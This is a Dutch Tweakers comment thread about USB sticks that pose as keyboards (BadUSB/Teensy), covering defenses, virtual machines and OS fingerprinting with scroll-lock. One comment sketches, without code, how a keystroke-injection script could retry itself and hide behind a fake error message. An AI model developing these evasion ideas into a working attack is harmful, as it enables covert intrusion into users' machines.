Hoe zit dat is die stick zich als toetsenbord (of muis) voordoet? Is de usb poort zo ingesteld dat het feitelijk slechts een stopcontact is geworden (en gebruik je dus geen usb randapparatuur?)
Wij gebruiken bijvoorbeeld Kaspersky Endpoint Security waarmee je, naast dat je exact kunt bepalen welk apparaat er aangesloten mag worden, ook een BadUSB functie hebt. Zodra een nieuw toetsenbord (HID) verbonden wordt, wordt gevraagt met dat apparaat een random code in te toetsen die dan in beeld verschijnt. Erg simpel en toch effectief.
Andere randapparatuur werkt maar data kopiëren is geblokkeerd. Dus een werknemer zal zelf ook z'n best moeten doen om de bestanden te openen. Als je als werknemer zoveel moeite doet om de beveiliging te omzeilen is het geen nieuwsgierigheid meer, maar heb je waarschijnlijk andere plannen.

Een usb stick met daarop iets dat zonder bestanden te openen die beveiliging omzeilt lijkt me namelijk vrij ingewikkeld zo niet onmogelijk te maken.
Een usb stick met daarop iets dat zonder bestanden te openen die beveiliging omzeilt lijkt me namelijk vrij ingewikkeld zo niet onmogelijk te maken.
En toch is dat wat hij heeft gemaakt, het is een teensy die zich voordoet als toetsenbord en code uitvoert door simpelweg toetsaanslagen naar de pc te sturen op het moment dat de usb stick verbinding heeft. Daarnaast staat een 'conventionele' usb stick met onschuldige bestanden, dus behalve een cmd prompt gedurende een fractie van een seconde ziet de gebruiker niks en gaat de virusscanner ook niey af. Briljant!
Ik vraag me af of die beveiliging waterdicht is.

De data+ en de data- zijn waarschijnlijk afgesloten maar de + en - voor de energie niet. Hoe moeilijk is het om daarvoor een exploit te vinden. Ligt ook aan de manier hoe dit geïmplementeerd is... Iemand die dat weet?
De usb is niet geheel afgesloten, maar kopiëren van data wel. Dat programma moet worden uitgeschakeld zonder iets te openen vanaf de usb stick en dat lukt niet zomaar.
Zou een virtuele machine op een normale pc afdoende zijn?
Als het een gewone usb stick is met malware op die de gebruiker moet "activeren" wel. Voor een hid stick niet, want die heeft zijn werk al gedaan voordat jij als gebruiker het usb device kan doormappen naar de vm.

Ik verwacht persoonlijk dat het verschil tussen studenten en werknemers heel klein gaat zijn. Werknemers van de IT afdeling zullen misschien iets achterdochtiger zijn (hoewel ik ook daar verwacht dat velen toch te nieuwsgierig zijn), maar bij alle andere werknemers verwacht ik geen wezenlijk verschil, ondanks alle awareness campagnes die bedrijven doen.
Niet alleen dat eerste, maar ook dat de HID stick zichzelf kan losmaken van de VM met dezelfde commando's als jij dit kan met je toetsenbord. In feite komt het erop neer dat het eigenlijk een toetsenbord is die alles kan wat jouw toetsenbord ok kan.
Hoe lees of controleer je een USB-stick zonder risico? In een soort virtual machine?
Ik zou een Bootable Linux CD/USB gebruiken op een apparaat wat verder geen gegevens/HDD bevat en uiteraard niet verbonden met het Internet.

[Reactie gewijzigd door EquiNox op 6 augustus 2016 16:40]

Het punt is dat je niet elke stick moet willen lezen. Alleen sticks van mensen die je vertrouwt. Je PC is net zo belangrijk als je iPhone en auto-sleutels.
De user is uiteindelijk altijd de zwakste schakel. Ga nooit zomaar random files lopen openen (web/usb) die je niet vertrouwd! Had het eigenlijk uitgemaakt als je de usb stick in een vm had geopend?

Moet eigenlijk ook maar eens beginnen aan mr.robot. Hoor zoveel goede dingen van die serie, blijkbaar verplichte kost. Duurt natuurlijk jaren eer dit naar de 'gewone' nederlandse tv komt.

[Reactie gewijzigd door parryfiend op 6 augustus 2016 09:49]

Mr. Robot is allang op de 'Nederlandse TV':

http://www.vpro.nl/programmas/Mr.-Robot/what-the-hack.html
Vanaf 22 oktober seizoen 2.

Het is echt een leuke serie, daar komen veel realistische hacks aan het licht, maar ook bekende exploits als 'heartbleed' enz.
Ah, tnx voor de heads up! Kijk heel weinig tv de laatste tijd. Ben benieuwd!
Ach de meeste mensen die het gezien hebben; hebben het niet gekeken via VPRO hoor :+
Haha, goed punt.
Dit is de reden waarom ik vindt dat er in tv land meer een verschuiving moet komen van live tv naar 'alles' on demand.

[Reactie gewijzigd door parryfiend op 6 augustus 2016 12:29]

Er valt niets te openen, het is namelijk geen echte USB stick maar ziet er alleen maar zo uit.
Dat ding is eigenlijk een volautomatisch toetsenbord die "toetsaanslagen" afspeelt richting de PC alsof het een gebruiker is die zit te kloppen op een toetsenbord.
Heb een paar jaar geleden eens zo'n ding in handen gehad en zodra je die in een PC stopte werd Internet Explorer geopend en vervolgens een URL ingeklopt waarna je dus terecht kwam op de website van het bedrijf dat die dingen weg wilde geven op een beurs oid.
Geen idee meer wie de producent van dat ding was maar dit is ongeveer het idee:
http://oxygenpromotions.com.au/connect-to-web/
De link naar het project werkt niet. :(

In Windows had men toch AutoRun uitgezet? Of hebben ze dat weer aangezet?
Tot zover ik het merk bij Windows 10 hebben ze het nooit compleet uitgezet maar alleen een vertraging op gezet...
Voor geen van de 3 aanvallen die hij noemt is Autorun nodig. Dat zou een vierde mogelijkheid zijn.
Erg interessant artikel. Ben benieuwd hoe het er over een paar jaar uitziet allemaal :)
Quote: Via het virtueel indrukken en vastzetten van de 'scroll lock'-toets kon hij op een snelle manier het besturingssysteem van het slachtoffer vaststellen.

Hoe werkt dit precies?
Geen idee. Om dat te doen in FreeBSD moet ik op ctrl-alt-f1 drukken om op de 1e hardwareconsole te komen waar ook de bootloader, kernel en de rest zijn opgestart. Vervolgens kan je met scroll-lock helemaal naar boven scrollen tot de OS introductietekst. Dan volgt een groot probleem: door de beveiliging van de meeste *nix systemen is het op afstand (zelfs als root) meestal heel moeilijk of niet te achterhalen welke informatie er nu in beeld staat. Behalve scroll-lock heb je ook nog iets of iemand nodig die de tekst leest en doorspeelt...

Ik vroeg me ook af hoe een toetsenbord vermomd als USB-stick zelfstandig een shell kan openen om daar commando's mee uit te voeren. Ik heb zelf sneltoetsen ingesteld om shell's mee te openen via de Openbox window manager. Probleem daarbij is dat een shell-window ook werkelijk in beeld moet staan en focus moet hebben om iets in te kunnen voeren...

Van zoiets als deze 'hack' zou ik wel eens een demonstratie willen zien van een fysiek aanwezige persoon die een computer met een gangbaar besturingssystemen erop via een USB-stick binnendringt terwijl het scherm op zwart staat. Volgens mij zijn er bijna altijd te veel afwijkende factoren die roet in het eten gooien en blijken systemen die het meest 'default' zijn, dus waarschijnlijk Windows over als mogelijk kwetsbaar. Van de 48% die zo'n gevonden stick inplugt schat ik dat er bij minder dan 1% van de gevallen iets kwaadaardigs mee mogelijk is. (Er vanuitgaande dat er geen 'autorun' dinges op staat en die personen niet zelf executables van die stick gaan uitvoeren).

[Reactie gewijzigd door blorf op 6 augustus 2016 09:22]

Geen idee. Om dat te doen in FreeBSD moet ik op ctrl-alt-f1 drukken om op de 1e hardwareconsole te komen waar ook de bootloader, kernel en de rest zijn opgestart. Vervolgens kan je met scroll-lock helemaal naar boven scrollen tot de OS introductietekst. Dan volgt een groot probleem: door de beveiliging van de meeste *nix systemen is het op afstand (zelfs als root) meestal heel moeilijk of niet te achterhalen welke informatie er nu in beeld staat. Behalve scroll-lock heb je ook nog iets of iemand nodig die de tekst leest en doorspeelt...
In de HID standaard zit ook support voor braille-lezers voor blinden.Ik kan zo snel niet vinden of er ook support voor een seriele console bij zit, maar gezien de geschiedenis van usb (als opvolger van de seriele kabel) verwacht ik het wel.
Die krijgen de data op het scherm gewoon letter voor letter door, zo is het eenvoudig om te zien wat er op het scherm staat.

Het kan ook nog dat hij helemaal niet kijkt naar wat er precies op het scherm staat, maar naar hoe het scherm reageert op toetsaanslagen. Bijvoorbeeld "reageert het capslock lampje nog als scroll lock aan staat".
Van zoiets als deze 'hack' zou ik wel eens een demonstratie willen zien van een fysiek aanwezige persoon die een computer met een gangbaar besturingssystemen erop via een USB-stick binnendringt terwijl het scherm op zwart staat. Volgens mij zijn er bijna altijd te veel afwijkende factoren die roet in het eten gooien en blijken systemen die het meest 'default' zijn, dus waarschijnlijk Windows over als mogelijk kwetsbaar.
Als hij niet meer nodig heeft dan wat HID-drivers dan ben ik bang dat best vele systemen kwetsbaar zijn. HID is juist ontworpen om universeel aanwezig te zijn.
Het is ook universeel aanwezig maar de HID zelf weet en bepaalt niet wat of wie er naar hem luistert. Dat doen de gebruiker of het OS. Hij wordt automatisch (*nix) als "stdin" aan hetzelfde proces gehangen als waar op dat moment de input van het normale toetsenbord naar toe gaat. Maar hoe kom je erachter wat dat is, of: hoe groot is de kans dat je dat blind goed gokt en ook weet wat je erheen moet sturen om een deur te openen (zonder de aandacht te trekken met dubieze activiteiten op het lokale scherm) ? Zo lang dat niet is gelukt ben je niet binnen en kan je volgens mij sowieso geen enkele andere informatiestroom binnen het systeem onderscheppen zoals wat er op het scherm wordt geplaatst of staat.

[Reactie gewijzigd door blorf op 6 augustus 2016 16:01]

Beetje offtopic op jouw post, maar ik vraag me af hoe effectief een HID-blokkerend AV is.

Mijn GData pakket geeft bij het insteken van een USB HID eerst een pop-up met de vraag of ik dit apparaat goedkeur. Pas na deze goedkeuring gaat windows aan de slag met het "herkennen" van de device. Voor mijn acceptie lijkt het device niets te (mogen) doen.

Ik ervaar dit regelmatig met mijn YubiKey, welke zich als HID USB toetsenbord identificeert. Ik kan niets met de YubiKey voor de acceptatie in Gdata.

Is dit een daadwerkelijk effectieve methode tegen auto-loading malware of meer een wassen-neus?
Is het niet zo dat toetsenbord aanslagen gewoon een code versturen naar de PC in de zin van 'deze moet je nu weergeven/activeren'? En dat waarschijnlijk daarom een detectie code nodig is om te weten welke script gebruikt moet worden ivm 'taalcode' en beveiliging?

Mijn gok tenminste.
Ik vroeg me ook af hoe een toetsenbord vermomd als USB-stick zelfstandig een shell kan openen om daar commando's mee uit te voeren. Ik heb zelf sneltoetsen ingesteld om shell's mee te openen via de Openbox window manager. Probleem daarbij is dat een shell-window ook werkelijk in beeld moet staan en focus moet hebben om iets in te kunnen voeren...
Ubuntu: Windows key, dan "terminal" plus enter, en je hebt een terminal. In Windows kan iets vergelijkbaars neem ik aan. Op de Mac, geen idee, maar het zou me niks verbazen.

Als iemand in de tussentijd de focus verlegt, dan werkt het misschien niet, poging mislukt, totdat iemand een dag later weer dat ding erin plugt omdat de eerste persoon zich afvraagt wat er nou mis is met die stick.

Het script op de stick zou zichzelf kunnen herhalen, na bv een minuut, als het script niet werkt. Als het script wel werkt, dan moet er een manier zijn om herhaalde uitvoering van het script stop te zetten, bv door de stick uit te schakelen in de hardware settings of de registry, want ik neem aan dat er niet terug gecommuniceerd kan worden naar de stick. Vervolgens laat je een foutmelding zien, dat de stick corrupt is, en mogelijk wordt het ding daarna weggegooid.

[Reactie gewijzigd door kwikstaart op 8 augustus 2016 11:53]

Ik zal wel een slechte hacker zijn maar het ene OS reageert sneller dan het ander, door een meting te doen weet je wat het is?
Of je bouwt een code die kijkt wat de machine doet nadat het commando wordt gegeven. Het OS zal verschillende processen starten omdat allerlei stukjes OS nu dienen te weten dat scroll-lock geactiveerd werd. Dat zal dan allerlei hooks hebben.

Als je eenmaal weet welke signalen het OS geeft aan bepaalde progs of threads of processen, neem ik aan als leek, dan weet je welk OS het is, want de manier waarop zal verschillen per OS.

Gok ik.
:D Lees eens het artikel, daar staat dat HID-spoofing wordt gedaan. Je usb-stick doet zich voor als een toetsenbord. Een toetsenbord is niet OS aware. Een willekeurig toetsenbord is zich er niet van bewust met welk OS hij praat, het is nou eenmaal niet zo ontworpen. De microprocessor op de fake usb-stick kan code uitvoeren, dat klopt, maar enkel instructies naar de computer verzenden volgens de HID speficicaties. In deze specificaties zitten dus géén mogelijkheid om uit te lezen welk OS je als hid-device mee verbonden bent. Dan lees je in het kopje Fingerprinting de handige truuc die gebruikt wordt: het uitlezen van scrollock status, deze instructie zit dus kennelijk wel in de HID specificatie en wordt gebruikt op de volgende manier: Je voert een powershell command uit waarmee scrollock getoggled wordt, vervolgens lees je via hid-spec uit of de scrollock veranderd is. Zo ja, dan weet je dat het systeem waarop je dit uitvoert een Windows systeem is, want de aanname is dat Powershell alleen op Windows draait. Op deze manier kan je verschillende "fingerprinting methods" gaan bedenken waarmee je grof of fijn een verschil kan maken in OS. (bijvoorbeeld Linux vs Windows vs OSX, of fijner: Windows 8 vs 10, etc etc etc)

Als ik dan windows draaide zou ik graag willen dat powershell api gepatched wordt om geen scrollock status meer te bevatten, maar daar zitten ook allerlei haken en ogen aan om dit te willen... dit is maar 1 voorbeeld, maar heeft al diepgaande complexiteit, welkom in de computer wereld :D
Ook ooit eens op een hackdag met de teensy gespeeld. Leuk om te doen. Toen bedacht ik me ook, dat als je toch ooit een onbekende USB-stick in je PC wil doen, je dat moet doen op je lockscreen. Zie je dan rare dingen gebeuren in je wachtwoord veld, dan weet je dat er iets niet pluis is. Nooit getest overigens ;) dus op eigen risico.
Nog beter; een aparte offline machine hiervoor hebben die echt voor dit ingericht is; en dus elke nacht opnieuw wordt geïnstalleerd.
Dan zou ik hem toch willen herinstalleren wanneer er iemand zijn ding in heeft gestoken gehad. Anders kan die offline machine geinfecteerd zijn en de volgende besmetten, die dan vervolgens de boel gaat verspreiden naar een andere pc, al dan niet thuis.

Op dit item kan niet meer gereageerd worden.



Apple iOS 10 Google Pixel Apple iPhone 7 Sony PlayStation VR AMD Radeon RX 480 4GB Battlefield 1 Google Android Nougat Watch Dogs 2

© 1998 - 2016 de Persgroep Online Services B.V. Tweakers vormt samen met o.a. Autotrack en Carsom.nl de Persgroep Online Services B.V. Hosting door True